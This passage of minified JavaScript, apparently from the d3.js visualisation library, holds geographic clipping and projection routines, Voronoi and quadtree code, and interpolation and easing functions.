De(n,t){return((n=n.x)[0]<0?n[1]-Ra-Ca:Ra-n[1])-((t=t.x)[0]<0?t[1]-Ra-Ca:Ra-t[1])}function Pe(n){var t,e=0/0,r=0/0,u=0/0;return{lineStart:function(){n.lineStart(),t=1},point:function(i,o){var a=i>0?qa:-qa,c=ga(i-e);ga(c-qa)<Ca?(n.point(e,r=(r+o)/2>0?Ra:-Ra),n.point(u,r),n.lineEnd(),n.lineStart(),n.point(a,r),n.point(i,r),t=0):u!==a&&c>=qa&&(ga(e-u)<Ca&&(e-=u*Ca),ga(i-a)<Ca&&(i-=a*Ca),r=Ue(e,r,i,o),n.point(u,r),n.lineEnd(),n.lineStart(),n.point(a,r),t=0),n.point(e=i,r=o),u=a},lineEnd:function(){n.lineEnd(),e=r=0/0},clean:function(){return 2-t}}}function Ue(n,t,e,r){var u,i,o=Math.sin(n-e);return ga(o)>Ca?Math.atan((Math.sin(t)*(i=Math.cos(r))*Math.sin(e)-Math.sin(r)*(u=Math.cos(t))*Math.sin(n))/(u*i*o)):(t+r)/2}function je(n,t,e,r){var u;if(null==n)u=e*Ra,r.point(-qa,u),r.point(0,u),r.point(qa,u),r.point(qa,0),r.point(qa,-u),r.point(0,-u),r.point(-qa,-u),r.point(-qa,0),r.point(-qa,u);else if(ga(n[0]-t[0])>Ca){var i=n[0]<t[0]?qa:-qa;u=e*i/2,r.point(-i,u),r.point(0,u),r.point(i,u)}else r.point(t[0],t[1])}function Fe(n,t){var e=n[0],r=n[1],u=[Math.sin(e),-Math.cos(e),0],i=0,o=0;yc.reset();for(var a=0,c=t.length;c>a;++a){var l=t[a],s=l.length;if(s)for(var f=l[0],h=f[0],g=f[1]/2+qa/4,p=Math.sin(g),v=Math.cos(g),d=1;;){d===s&&(d=0),n=l[d];var m=n[0],y=n[1]/2+qa/4,M=Math.sin(y),x=Math.cos(y),b=m-h,_=b>=0?1:-1,w=_*b,S=w>qa,k=p*M;if(yc.add(Math.atan2(k*_*Math.sin(w),v*x+k*Math.cos(w))),i+=S?b+_*La:b,S^h>=e^m>=e){var E=de(pe(f),pe(n));Me(E);var A=de(u,E);Me(A);var N=(S^b>=0?-1:1)*tt(A[2]);(r>N||r===N&&(E[0]||E[1]))&&(o+=S^b>=0?1:-1)}if(!d++)break;h=m,p=M,v=x,f=n}}return(-Ca>i||Ca>i&&0>yc)^1&o}function He(n){function t(n,t){return Math.cos(n)*Math.cos(t)>i}function e(n){var e,i,c,l,s;return{lineStart:function(){l=c=!1,s=1},point:function(f,h){var g,p=[f,h],v=t(f,h),d=o?v?0:u(f,h):v?u(f+(0>f?qa:-qa),h):0;if(!e&&(l=c=v)&&n.lineStart(),v!==c&&(g=r(e,p),(be(e,g)||be(p,g))&&(p[0]+=Ca,p[1]+=Ca,v=t(p[0],p[1]))),v!==c)s=0,v?(n.lineStart(),g=r(p,e),n.point(g[0],g[1])):(g=r(e,p),n.point(g[0],g[1]),n.lineEnd()),e=g;else if(a&&e&&o^v){var m;d&i||!(m=r(p,e,!0))||(s=0,o?(n.lineStart(),n.point(m[0][0],m[0][1]),n.point(m[1][0],m[1][1]),n.lineEnd()):(n.point(m[1][0],m[1][1]),n.lineEnd(),n.lineStart(),n.point(m[0][0],m[0][1])))}!v||e&&be(e,p)||n.point(p[0],p[1]),e=p,c=v,i=d},lineEnd:function(){c&&n.lineEnd(),e=null},clean:function(){return s|(l&&c)<<1}}}function r(n,t,e){var r=pe(n),u=pe(t),o=[1,0,0],a=de(r,u),c=ve(a,a),l=a[0],s=c-l*l;if(!s)return!e&&n;var f=i*c/s,h=-i*l/s,g=de(o,a),p=ye(o,f),v=ye(a,h);me(p,v);var d=g,m=ve(p,d),y=ve(d,d),M=m*m-y*(ve(p,p)-1);if(!(0>M)){var x=Math.sqrt(M),b=ye(d,(-m-x)/y);if(me(b,p),b=xe(b),!e)return b;var _,w=n[0],S=t[0],k=n[1],E=t[1];w>S&&(_=w,w=S,S=_);var A=S-w,N=ga(A-qa)<Ca,C=N||Ca>A;if(!N&&k>E&&(_=k,k=E,E=_),C?N?k+E>0^b[1]<(ga(b[0]-w)<Ca?k:E):k<=b[1]&&b[1]<=E:A>qa^(w<=b[0]&&b[0]<=S)){var z=ye(d,(-m+x)/y);return me(z,p),[b,xe(z)]}}}function u(t,e){var r=o?n:qa-n,u=0;return-r>t?u|=1:t>r&&(u|=2),-r>e?u|=4:e>r&&(u|=8),u}var i=Math.cos(n),o=i>0,a=ga(i)>Ca,c=gr(n,6*Da);return Le(t,e,c,o?[0,-n]:[-qa,n-qa])}function Oe(n,t,e,r){return function(u){var i,o=u.a,a=u.b,c=o.x,l=o.y,s=a.x,f=a.y,h=0,g=1,p=s-c,v=f-l;if(i=n-c,p||!(i>0)){if(i/=p,0>p){if(h>i)return;g>i&&(g=i)}else if(p>0){if(i>g)return;i>h&&(h=i)}if(i=e-c,p||!(0>i)){if(i/=p,0>p){if(i>g)return;i>h&&(h=i)}else if(p>0){if(h>i)return;g>i&&(g=i)}if(i=t-l,v||!(i>0)){if(i/=v,0>v){if(h>i)return;g>i&&(g=i)}else if(v>0){if(i>g)return;i>h&&(h=i)}if(i=r-l,v||!(0>i)){if(i/=v,0>v){if(i>g)return;i>h&&(h=i)}else if(v>0){if(h>i)return;g>i&&(g=i)}return h>0&&(u.a={x:c+h*p,y:l+h*v}),1>g&&(u.b={x:c+g*p,y:l+g*v}),u}}}}}}function Ie(n,t,e,r){function u(r,u){return ga(r[0]-n)<Ca?u>0?0:3:ga(r[0]-e)<Ca?u>0?2:1:ga(r[1]-t)<Ca?u>0?1:0:u>0?3:2}function i(n,t){return o(n.x,t.x)}function o(n,t){var e=u(n,1),r=u(t,1);return e!==r?e-r:0===e?t[1]-n[1]:1===e?n[0]-t[0]:2===e?n[1]-t[1]:t[0]-n[0]}return function(a){function c(n){for(var t=0,e=d.length,r=n[1],u=0;e>u;++u)for(var i,o=1,a=d[u],c=a.length,l=a[0];c>o;++o)i=a[o],l[1]<=r?i[1]>r&&Q(l,i,n)>0&&++t:i[1]<=r&&Q(l,i,n)<0&&--t,l=i;return 0!==t}function l(i,a,c,l){var s=0,f=0;if(null==i||(s=u(i,c))!==(f=u(a,c))||o(i,a)<0^c>0){do l.point(0===s||3===s?n:e,s>1?r:t);while((s=(s+c+4)%4)!==f)}else l.point(a[0],a[1])}function s(u,i){return u>=n&&e>=u&&i>=t&&r>=i}function f(n,t){s(n,t)&&a.point(n,t)}function h(){C.point=p,d&&d.push(m=[]),S=!0,w=!1,b=_=0/0}function g(){v&&(p(y,M),x&&w&&A.rejoin(),v.push(A.buffer())),C.point=f,w&&a.lineEnd()}function p(n,t){n=Math.max(-Tc,Math.min(Tc,n)),t=Math.max(-Tc,Math.min(Tc,t));var e=s(n,t);if(d&&m.push([n,t]),S)y=n,M=t,x=e,S=!1,e&&(a.lineStart(),a.point(n,t));else if(e&&w)a.point(n,t);else{var r={a:{x:b,y:_},b:{x:n,y:t}};N(r)?(w||(a.lineStart(),a.point(r.a.x,r.a.y)),a.point(r.b.x,r.b.y),e||a.lineEnd(),k=!1):e&&(a.lineStart(),a.point(n,t),k=!1)}b=n,_=t,w=e}var v,d,m,y,M,x,b,_,w,S,k,E=a,A=Re(),N=Oe(n,t,e,r),C={point:f,lineStart:h,lineEnd:g,polygonStart:function(){a=A,v=[],d=[],k=!0},polygonEnd:function(){a=E,v=ta.merge(v);var t=c([n,r]),e=k&&t,u=v.length;(e||u)&&(a.polygonStart(),e&&(a.lineStart(),l(null,null,1,a),a.lineEnd()),u&&Ce(v,i,t,l,a),a.polygonEnd()),v=d=m=null}};return C}}function Ye(n){var t=0,e=qa/3,r=ir(n),u=r(t,e);return u.parallels=function(n){return arguments.length?r(t=n[0]*qa/180,e=n[1]*qa/180):[t/qa*180,e/qa*180]},u}function Ze(n,t){function e(n,t){var e=Math.sqrt(i-2*u*Math.sin(t))/u;return[e*Math.sin(n*=u),o-e*Math.cos(n)]}var r=Math.sin(n),u=(r+Math.sin(t))/2,i=1+r*(2*u-r),o=Math.sqrt(i)/u;return e.invert=function(n,t){var e=o-t;return[Math.atan2(n,e)/u,tt((i-(n*n+e*e)*u*u)/(2*u))]},e}function Ve(){function n(n,t){Dc+=u*n-r*t,r=n,u=t}var t,e,r,u;Hc.point=function(i,o){Hc.point=n,t=r=i,e=u=o},Hc.lineEnd=function(){n(t,e)}}function Xe(n,t){Pc>n&&(Pc=n),n>jc&&(jc=n),Uc>t&&(Uc=t),t>Fc&&(Fc=t)}function $e(){function n(n,t){o.push("M",n,",",t,i)}function t(n,t){o.push("M",n,",",t),a.point=e}function e(n,t){o.push("L",n,",",t)}function r(){a.point=n}function u(){o.push("Z")}var i=Be(4.5),o=[],a={point:n,lineStart:function(){a.point=t},lineEnd:r,polygonStart:function(){a.lineEnd=u},polygonEnd:function(){a.lineEnd=r,a.point=n},pointRadius:function(n){return i=Be(n),a},result:function(){if(o.length){var n=o.join("");return o=[],n}}};return a}function Be(n){return"m0,"+n+"a"+n+","+n+" 0 1,1 0,"+-2*n+"a"+n+","+n+" 0 1,1 0,"+2*n+"z"}function We(n,t){_c+=n,wc+=t,++Sc}function Je(){function n(n,r){var u=n-t,i=r-e,o=Math.sqrt(u*u+i*i);kc+=o*(t+n)/2,Ec+=o*(e+r)/2,Ac+=o,We(t=n,e=r)}var t,e;Ic.point=function(r,u){Ic.point=n,We(t=r,e=u)}}function Ge(){Ic.point=We}function Ke(){function n(n,t){var e=n-r,i=t-u,o=Math.sqrt(e*e+i*i);kc+=o*(r+n)/2,Ec+=o*(u+t)/2,Ac+=o,o=u*n-r*t,Nc+=o*(r+n),Cc+=o*(u+t),zc+=3*o,We(r=n,u=t)}var t,e,r,u;Ic.point=function(i,o){Ic.point=n,We(t=r=i,e=u=o)},Ic.lineEnd=function(){n(t,e)}}function Qe(n){function t(t,e){n.moveTo(t+o,e),n.arc(t,e,o,0,La)}function e(t,e){n.moveTo(t,e),a.point=r}function r(t,e){n.lineTo(t,e)}function u(){a.point=t}function i(){n.closePath()}var o=4.5,a={point:t,lineStart:function(){a.point=e},lineEnd:u,polygonStart:function(){a.lineEnd=i},polygonEnd:function(){a.lineEnd=u,a.point=t},pointRadius:function(n){return o=n,a},result:b};return a}function nr(n){function t(n){return(a?r:e)(n)}function e(t){return rr(t,function(e,r){e=n(e,r),t.point(e[0],e[1])})}function r(t){function e(e,r){e=n(e,r),t.point(e[0],e[1])}function r(){M=0/0,S.point=i,t.lineStart()}function i(e,r){var i=pe([e,r]),o=n(e,r);u(M,x,y,b,_,w,M=o[0],x=o[1],y=e,b=i[0],_=i[1],w=i[2],a,t),t.point(M,x)}function o(){S.point=e,t.lineEnd()}function c(){r(),S.point=l,S.lineEnd=s}function l(n,t){i(f=n,h=t),g=M,p=x,v=b,d=_,m=w,S.point=i}function s(){u(M,x,y,b,_,w,g,p,f,v,d,m,a,t),S.lineEnd=o,o()}var f,h,g,p,v,d,m,y,M,x,b,_,w,S={point:e,lineStart:r,lineEnd:o,polygonStart:function(){t.polygonStart(),S.lineStart=c
},polygonEnd:function(){t.polygonEnd(),S.lineStart=r}};return S}function u(t,e,r,a,c,l,s,f,h,g,p,v,d,m){var y=s-t,M=f-e,x=y*y+M*M;if(x>4*i&&d--){var b=a+g,_=c+p,w=l+v,S=Math.sqrt(b*b+_*_+w*w),k=Math.asin(w/=S),E=ga(ga(w)-1)<Ca||ga(r-h)<Ca?(r+h)/2:Math.atan2(_,b),A=n(E,k),N=A[0],C=A[1],z=N-t,q=C-e,L=M*z-y*q;(L*L/x>i||ga((y*z+M*q)/x-.5)>.3||o>a*g+c*p+l*v)&&(u(t,e,r,a,c,l,N,C,E,b/=S,_/=S,w,d,m),m.point(N,C),u(N,C,E,b,_,w,s,f,h,g,p,v,d,m))}}var i=.5,o=Math.cos(30*Da),a=16;return t.precision=function(n){return arguments.length?(a=(i=n*n)>0&&16,t):Math.sqrt(i)},t}function tr(n){var t=nr(function(t,e){return n([t*Pa,e*Pa])});return function(n){return or(t(n))}}function er(n){this.stream=n}function rr(n,t){return{point:t,sphere:function(){n.sphere()},lineStart:function(){n.lineStart()},lineEnd:function(){n.lineEnd()},polygonStart:function(){n.polygonStart()},polygonEnd:function(){n.polygonEnd()}}}function ur(n){return ir(function(){return n})()}function ir(n){function t(n){return n=a(n[0]*Da,n[1]*Da),[n[0]*h+c,l-n[1]*h]}function e(n){return n=a.invert((n[0]-c)/h,(l-n[1])/h),n&&[n[0]*Pa,n[1]*Pa]}function r(){a=Ae(o=lr(m,M,x),i);var n=i(v,d);return c=g-n[0]*h,l=p+n[1]*h,u()}function u(){return s&&(s.valid=!1,s=null),t}var i,o,a,c,l,s,f=nr(function(n,t){return n=i(n,t),[n[0]*h+c,l-n[1]*h]}),h=150,g=480,p=250,v=0,d=0,m=0,M=0,x=0,b=Lc,_=y,w=null,S=null;return t.stream=function(n){return s&&(s.valid=!1),s=or(b(o,f(_(n)))),s.valid=!0,s},t.clipAngle=function(n){return arguments.length?(b=null==n?(w=n,Lc):He((w=+n)*Da),u()):w},t.clipExtent=function(n){return arguments.length?(S=n,_=n?Ie(n[0][0],n[0][1],n[1][0],n[1][1]):y,u()):S},t.scale=function(n){return arguments.length?(h=+n,r()):h},t.translate=function(n){return arguments.length?(g=+n[0],p=+n[1],r()):[g,p]},t.center=function(n){return arguments.length?(v=n[0]%360*Da,d=n[1]%360*Da,r()):[v*Pa,d*Pa]},t.rotate=function(n){return arguments.length?(m=n[0]%360*Da,M=n[1]%360*Da,x=n.length>2?n[2]%360*Da:0,r()):[m*Pa,M*Pa,x*Pa]},ta.rebind(t,f,"precision"),function(){return i=n.apply(this,arguments),t.invert=i.invert&&e,r()}}function or(n){return rr(n,function(t,e){n.point(t*Da,e*Da)})}function ar(n,t){return[n,t]}function cr(n,t){return[n>qa?n-La:-qa>n?n+La:n,t]}function lr(n,t,e){return n?t||e?Ae(fr(n),hr(t,e)):fr(n):t||e?hr(t,e):cr}function sr(n){return function(t,e){return t+=n,[t>qa?t-La:-qa>t?t+La:t,e]}}function fr(n){var t=sr(n);return t.invert=sr(-n),t}function hr(n,t){function e(n,t){var e=Math.cos(t),a=Math.cos(n)*e,c=Math.sin(n)*e,l=Math.sin(t),s=l*r+a*u;return[Math.atan2(c*i-s*o,a*r-l*u),tt(s*i+c*o)]}var r=Math.cos(n),u=Math.sin(n),i=Math.cos(t),o=Math.sin(t);return e.invert=function(n,t){var e=Math.cos(t),a=Math.cos(n)*e,c=Math.sin(n)*e,l=Math.sin(t),s=l*i-c*o;return[Math.atan2(c*i+l*o,a*r+s*u),tt(s*r-a*u)]},e}function gr(n,t){var e=Math.cos(n),r=Math.sin(n);return function(u,i,o,a){var c=o*t;null!=u?(u=pr(e,u),i=pr(e,i),(o>0?i>u:u>i)&&(u+=o*La)):(u=n+o*La,i=n-.5*c);for(var l,s=u;o>0?s>i:i>s;s-=c)a.point((l=xe([e,-r*Math.cos(s),-r*Math.sin(s)]))[0],l[1])}}function pr(n,t){var e=pe(t);e[0]-=n,Me(e);var r=nt(-e[1]);return((-e[2]<0?-r:r)+2*Math.PI-Ca)%(2*Math.PI)}function vr(n,t,e){var r=ta.range(n,t-Ca,e).concat(t);return function(n){return r.map(function(t){return[n,t]})}}function dr(n,t,e){var r=ta.range(n,t-Ca,e).concat(t);return function(n){return r.map(function(t){return[t,n]})}}function mr(n){return n.source}function yr(n){return n.target}function Mr(n,t,e,r){var u=Math.cos(t),i=Math.sin(t),o=Math.cos(r),a=Math.sin(r),c=u*Math.cos(n),l=u*Math.sin(n),s=o*Math.cos(e),f=o*Math.sin(e),h=2*Math.asin(Math.sqrt(it(r-t)+u*o*it(e-n))),g=1/Math.sin(h),p=h?function(n){var t=Math.sin(n*=h)*g,e=Math.sin(h-n)*g,r=e*c+t*s,u=e*l+t*f,o=e*i+t*a;return[Math.atan2(u,r)*Pa,Math.atan2(o,Math.sqrt(r*r+u*u))*Pa]}:function(){return[n*Pa,t*Pa]};return p.distance=h,p}function xr(){function n(n,u){var i=Math.sin(u*=Da),o=Math.cos(u),a=ga((n*=Da)-t),c=Math.cos(a);Yc+=Math.atan2(Math.sqrt((a=o*Math.sin(a))*a+(a=r*i-e*o*c)*a),e*i+r*o*c),t=n,e=i,r=o}var t,e,r;Zc.point=function(u,i){t=u*Da,e=Math.sin(i*=Da),r=Math.cos(i),Zc.point=n},Zc.lineEnd=function(){Zc.point=Zc.lineEnd=b}}function br(n,t){function e(t,e){var r=Math.cos(t),u=Math.cos(e),i=n(r*u);return[i*u*Math.sin(t),i*Math.sin(e)]}return e.invert=function(n,e){var r=Math.sqrt(n*n+e*e),u=t(r),i=Math.sin(u),o=Math.cos(u);return[Math.atan2(n*i,r*o),Math.asin(r&&e*i/r)]},e}function _r(n,t){function e(n,t){o>0?-Ra+Ca>t&&(t=-Ra+Ca):t>Ra-Ca&&(t=Ra-Ca);var e=o/Math.pow(u(t),i);return[e*Math.sin(i*n),o-e*Math.cos(i*n)]}var r=Math.cos(n),u=function(n){return Math.tan(qa/4+n/2)},i=n===t?Math.sin(n):Math.log(r/Math.cos(t))/Math.log(u(t)/u(n)),o=r*Math.pow(u(n),i)/i;return i?(e.invert=function(n,t){var e=o-t,r=K(i)*Math.sqrt(n*n+e*e);return[Math.atan2(n,e)/i,2*Math.atan(Math.pow(o/r,1/i))-Ra]},e):Sr}function wr(n,t){function e(n,t){var e=i-t;return[e*Math.sin(u*n),i-e*Math.cos(u*n)]}var r=Math.cos(n),u=n===t?Math.sin(n):(r-Math.cos(t))/(t-n),i=r/u+n;return ga(u)<Ca?ar:(e.invert=function(n,t){var e=i-t;return[Math.atan2(n,e)/u,i-K(u)*Math.sqrt(n*n+e*e)]},e)}function Sr(n,t){return[n,Math.log(Math.tan(qa/4+t/2))]}function kr(n){var t,e=ur(n),r=e.scale,u=e.translate,i=e.clipExtent;return e.scale=function(){var n=r.apply(e,arguments);return n===e?t?e.clipExtent(null):e:n},e.translate=function(){var n=u.apply(e,arguments);return n===e?t?e.clipExtent(null):e:n},e.clipExtent=function(n){var o=i.apply(e,arguments);if(o===e){if(t=null==n){var a=qa*r(),c=u();i([[c[0]-a,c[1]-a],[c[0]+a,c[1]+a]])}}else t&&(o=null);return o},e.clipExtent(null)}function Er(n,t){return[Math.log(Math.tan(qa/4+t/2)),-n]}function Ar(n){return n[0]}function Nr(n){return n[1]}function Cr(n){for(var t=n.length,e=[0,1],r=2,u=2;t>u;u++){for(;r>1&&Q(n[e[r-2]],n[e[r-1]],n[u])<=0;)--r;e[r++]=u}return e.slice(0,r)}function zr(n,t){return n[0]-t[0]||n[1]-t[1]}function qr(n,t,e){return(e[0]-t[0])*(n[1]-t[1])<(e[1]-t[1])*(n[0]-t[0])}function Lr(n,t,e,r){var u=n[0],i=e[0],o=t[0]-u,a=r[0]-i,c=n[1],l=e[1],s=t[1]-c,f=r[1]-l,h=(a*(c-l)-f*(u-i))/(f*o-a*s);return[u+h*o,c+h*s]}function Tr(n){var t=n[0],e=n[n.length-1];return!(t[0]-e[0]||t[1]-e[1])}function Rr(){tu(this),this.edge=this.site=this.circle=null}function Dr(n){var t=el.pop()||new Rr;return t.site=n,t}function Pr(n){Xr(n),Qc.remove(n),el.push(n),tu(n)}function Ur(n){var t=n.circle,e=t.x,r=t.cy,u={x:e,y:r},i=n.P,o=n.N,a=[n];Pr(n);for(var c=i;c.circle&&ga(e-c.circle.x)<Ca&&ga(r-c.circle.cy)<Ca;)i=c.P,a.unshift(c),Pr(c),c=i;a.unshift(c),Xr(c);for(var l=o;l.circle&&ga(e-l.circle.x)<Ca&&ga(r-l.circle.cy)<Ca;)o=l.N,a.push(l),Pr(l),l=o;a.push(l),Xr(l);var s,f=a.length;for(s=1;f>s;++s)l=a[s],c=a[s-1],Kr(l.edge,c.site,l.site,u);c=a[0],l=a[f-1],l.edge=Jr(c.site,l.site,null,u),Vr(c),Vr(l)}function jr(n){for(var t,e,r,u,i=n.x,o=n.y,a=Qc._;a;)if(r=Fr(a,o)-i,r>Ca)a=a.L;else{if(u=i-Hr(a,o),!(u>Ca)){r>-Ca?(t=a.P,e=a):u>-Ca?(t=a,e=a.N):t=e=a;break}if(!a.R){t=a;break}a=a.R}var c=Dr(n);if(Qc.insert(t,c),t||e){if(t===e)return Xr(t),e=Dr(t.site),Qc.insert(c,e),c.edge=e.edge=Jr(t.site,c.site),Vr(t),void Vr(e);if(!e)return void(c.edge=Jr(t.site,c.site));Xr(t),Xr(e);var l=t.site,s=l.x,f=l.y,h=n.x-s,g=n.y-f,p=e.site,v=p.x-s,d=p.y-f,m=2*(h*d-g*v),y=h*h+g*g,M=v*v+d*d,x={x:(d*y-g*M)/m+s,y:(h*M-v*y)/m+f};Kr(e.edge,l,p,x),c.edge=Jr(l,n,null,x),e.edge=Jr(n,p,null,x),Vr(t),Vr(e)}}function Fr(n,t){var e=n.site,r=e.x,u=e.y,i=u-t;if(!i)return r;var o=n.P;if(!o)return-1/0;e=o.site;var a=e.x,c=e.y,l=c-t;if(!l)return a;var s=a-r,f=1/i-1/l,h=s/l;return f?(-h+Math.sqrt(h*h-2*f*(s*s/(-2*l)-c+l/2+u-i/2)))/f+r:(r+a)/2}function Hr(n,t){var e=n.N;if(e)return Fr(e,t);var r=n.site;return r.y===t?r.x:1/0}function Or(n){this.site=n,this.edges=[]}function Ir(n){for(var t,e,r,u,i,o,a,c,l,s,f=n[0][0],h=n[1][0],g=n[0][1],p=n[1][1],v=Kc,d=v.length;d--;)if(i=v[d],i&&i.prepare())for(a=i.edges,c=a.length,o=0;c>o;)s=a[o].end(),r=s.x,u=s.y,l=a[++o%c].start(),t=l.x,e=l.y,(ga(r-t)>Ca||ga(u-e)>Ca)&&(a.splice(o,0,new Qr(Gr(i.site,s,ga(r-f)<Ca&&p-u>Ca?{x:f,y:ga(t-f)<Ca?e:p}:ga(u-p)<Ca&&h-r>Ca?{x:ga(e-p)<Ca?t:h,y:p}:ga(r-h)<Ca&&u-g>Ca?{x:h,y:ga(t-h)<Ca?e:g}:ga(u-g)<Ca&&r-f>Ca?{x:ga(e-g)<Ca?t:f,y:g}:null),i.site,null)),++c)}function Yr(n,t){return t.angle-n.angle}function Zr(){tu(this),this.x=this.y=this.arc=this.site=this.cy=null}function Vr(n){var t=n.P,e=n.N;if(t&&e){var r=t.site,u=n.site,i=e.site;if(r!==i){var o=u.x,a=u.y,c=r.x-o,l=r.y-a,s=i.x-o,f=i.y-a,h=2*(c*f-l*s);if(!(h>=-za)){var g=c*c+l*l,p=s*s+f*f,v=(f*g-l*p)/h,d=(c*p-s*g)/h,f=d+a,m=rl.pop()||new Zr;m.arc=n,m.site=u,m.x=v+o,m.y=f+Math.sqrt(v*v+d*d),m.cy=f,n.circle=m;for(var y=null,M=tl._;M;)if(m.y<M.y||m.y===M.y&&m.x<=M.x){if(!M.L){y=M.P;break}M=M.L}else{if(!M.R){y=M;break}M=M.R}tl.insert(y,m),y||(nl=m)}}}}function Xr(n){var t=n.circle;t&&(t.P||(nl=t.N),tl.remove(t),rl.push(t),tu(t),n.circle=null)}function $r(n){for(var t,e=Gc,r=Oe(n[0][0],n[0][1],n[1][0],n[1][1]),u=e.length;u--;)t=e[u],(!Br(t,n)||!r(t)||ga(t.a.x-t.b.x)<Ca&&ga(t.a.y-t.b.y)<Ca)&&(t.a=t.b=null,e.splice(u,1))}function Br(n,t){var e=n.b;if(e)return!0;var r,u,i=n.a,o=t[0][0],a=t[1][0],c=t[0][1],l=t[1][1],s=n.l,f=n.r,h=s.x,g=s.y,p=f.x,v=f.y,d=(h+p)/2,m=(g+v)/2;if(v===g){if(o>d||d>=a)return;if(h>p){if(i){if(i.y>=l)return}else i={x:d,y:c};e={x:d,y:l}}else{if(i){if(i.y<c)return}else i={x:d,y:l};e={x:d,y:c}}}else if(r=(h-p)/(v-g),u=m-r*d,-1>r||r>1)if(h>p){if(i){if(i.y>=l)return}else i={x:(c-u)/r,y:c};e={x:(l-u)/r,y:l}}else{if(i){if(i.y<c)return}else i={x:(l-u)/r,y:l};e={x:(c-u)/r,y:c}}else if(v>g){if(i){if(i.x>=a)return}else i={x:o,y:r*o+u};e={x:a,y:r*a+u}}else{if(i){if(i.x<o)return}else i={x:a,y:r*a+u};e={x:o,y:r*o+u}}return n.a=i,n.b=e,!0}function Wr(n,t){this.l=n,this.r=t,this.a=this.b=null}function Jr(n,t,e,r){var u=new Wr(n,t);return Gc.push(u),e&&Kr(u,n,t,e),r&&Kr(u,t,n,r),Kc[n.i].edges.push(new Qr(u,n,t)),Kc[t.i].edges.push(new Qr(u,t,n)),u}function Gr(n,t,e){var r=new Wr(n,null);return r.a=t,r.b=e,Gc.push(r),r}function Kr(n,t,e,r){n.a||n.b?n.l===e?n.b=r:n.a=r:(n.a=r,n.l=t,n.r=e)}function Qr(n,t,e){var r=n.a,u=n.b;this.edge=n,this.site=t,this.angle=e?Math.atan2(e.y-t.y,e.x-t.x):n.l===t?Math.atan2(u.x-r.x,r.y-u.y):Math.atan2(r.x-u.x,u.y-r.y)}function nu(){this._=null}function tu(n){n.U=n.C=n.L=n.R=n.P=n.N=null}function eu(n,t){var e=t,r=t.R,u=e.U;u?u.L===e?u.L=r:u.R=r:n._=r,r.U=u,e.U=r,e.R=r.L,e.R&&(e.R.U=e),r.L=e}function ru(n,t){var e=t,r=t.L,u=e.U;u?u.L===e?u.L=r:u.R=r:n._=r,r.U=u,e.U=r,e.L=r.R,e.L&&(e.L.U=e),r.R=e}function uu(n){for(;n.L;)n=n.L;return n}function iu(n,t){var e,r,u,i=n.sort(ou).pop();for(Gc=[],Kc=new Array(n.length),Qc=new nu,tl=new nu;;)if(u=nl,i&&(!u||i.y<u.y||i.y===u.y&&i.x<u.x))(i.x!==e||i.y!==r)&&(Kc[i.i]=new Or(i),jr(i),e=i.x,r=i.y),i=n.pop();else{if(!u)break;Ur(u.arc)}t&&($r(t),Ir(t));var o={cells:Kc,edges:Gc};return Qc=tl=Gc=Kc=null,o}function ou(n,t){return t.y-n.y||t.x-n.x}function au(n,t,e){return(n.x-e.x)*(t.y-n.y)-(n.x-t.x)*(e.y-n.y)}function cu(n){return n.x}function lu(n){return n.y}function su(){return{leaf:!0,nodes:[],point:null,x:null,y:null}}function fu(n,t,e,r,u,i){if(!n(t,e,r,u,i)){var o=.5*(e+u),a=.5*(r+i),c=t.nodes;c[0]&&fu(n,c[0],e,r,o,a),c[1]&&fu(n,c[1],o,r,u,a),c[2]&&fu(n,c[2],e,a,o,i),c[3]&&fu(n,c[3],o,a,u,i)}}function hu(n,t,e,r,u,i,o){var a,c=1/0;return function l(n,s,f,h,g){if(!(s>i||f>o||r>h||u>g)){if(p=n.point){var p,v=t-n.x,d=e-n.y,m=v*v+d*d;if(c>m){var y=Math.sqrt(c=m);r=t-y,u=e-y,i=t+y,o=e+y,a=p}}for(var M=n.nodes,x=.5*(s+h),b=.5*(f+g),_=t>=x,w=e>=b,S=w<<1|_,k=S+4;k>S;++S)if(n=M[3&S])switch(3&S){case 0:l(n,s,f,x,b);break;case 1:l(n,x,f,h,b);break;case 2:l(n,s,b,x,g);break;case 3:l(n,x,b,h,g)}}}(n,r,u,i,o),a}function gu(n,t){n=ta.rgb(n),t=ta.rgb(t);var e=n.r,r=n.g,u=n.b,i=t.r-e,o=t.g-r,a=t.b-u;return function(n){return"#"+xt(Math.round(e+i*n))+xt(Math.round(r+o*n))+xt(Math.round(u+a*n))}}function pu(n,t){var e,r={},u={};for(e in n)e in t?r[e]=mu(n[e],t[e]):u[e]=n[e];for(e in t)e in n||(u[e]=t[e]);return function(n){for(e in r)u[e]=r[e](n);return u}}function vu(n,t){return n=+n,t=+t,function(e){return n*(1-e)+t*e}}function du(n,t){var e,r,u,i=il.lastIndex=ol.lastIndex=0,o=-1,a=[],c=[];for(n+="",t+="";(e=il.exec(n))&&(r=ol.exec(t));)(u=r.index)>i&&(u=t.slice(i,u),a[o]?a[o]+=u:a[++o]=u),(e=e[0])===(r=r[0])?a[o]?a[o]+=r:a[++o]=r:(a[++o]=null,c.push({i:o,x:vu(e,r)})),i=ol.lastIndex;return i<t.length&&(u=t.slice(i),a[o]?a[o]+=u:a[++o]=u),a.length<2?c[0]?(t=c[0].x,function(n){return t(n)+""}):function(){return t}:(t=c.length,function(n){for(var e,r=0;t>r;++r)a[(e=c[r]).i]=e.x(n);return a.join("")})}function mu(n,t){for(var e,r=ta.interpolators.length;--r>=0&&!(e=ta.interpolators[r](n,t)););return e}function yu(n,t){var e,r=[],u=[],i=n.length,o=t.length,a=Math.min(n.length,t.length);for(e=0;a>e;++e)r.push(mu(n[e],t[e]));for(;i>e;++e)u[e]=n[e];for(;o>e;++e)u[e]=t[e];return function(n){for(e=0;a>e;++e)u[e]=r[e](n);return u}}function Mu(n){return function(t){return 0>=t?0:t>=1?1:n(t)}}function xu(n){return function(t){return 1-n(1-t)}}function bu(n){return function(t){return.5*(.5>t?n(2*t):2-n(2-2*t))}}function _u(n){return n*n}function wu(n){return n*n*n}function Su(n){if(0>=n)return 0;if(n>=1)return 1;var t=n*n,e=t*n;return 4*(.5>n?e:3*(n-t)+e-.75)}function ku(n){return function(t){return Math.pow(t,n)}}function Eu(n){return 1-Math.cos(n*Ra)}function Au(n){return Math.pow(2,10*(n-1))}function Nu(n){return 1-Math.sqrt(1-n*n)}function Cu(n,t){var e;return arguments.length<2&&(t=.45),arguments.length?e=t/La*Math.asin(1/n):(n=1,e=t/4),function(r){return 1+n*Math.pow(2,-10*r)*Math.sin((r-e)*La/t)}}function zu(n){return n||(n=1.70158),function(t){return t*t*((n+1)*t-n)}}function qu(n){return 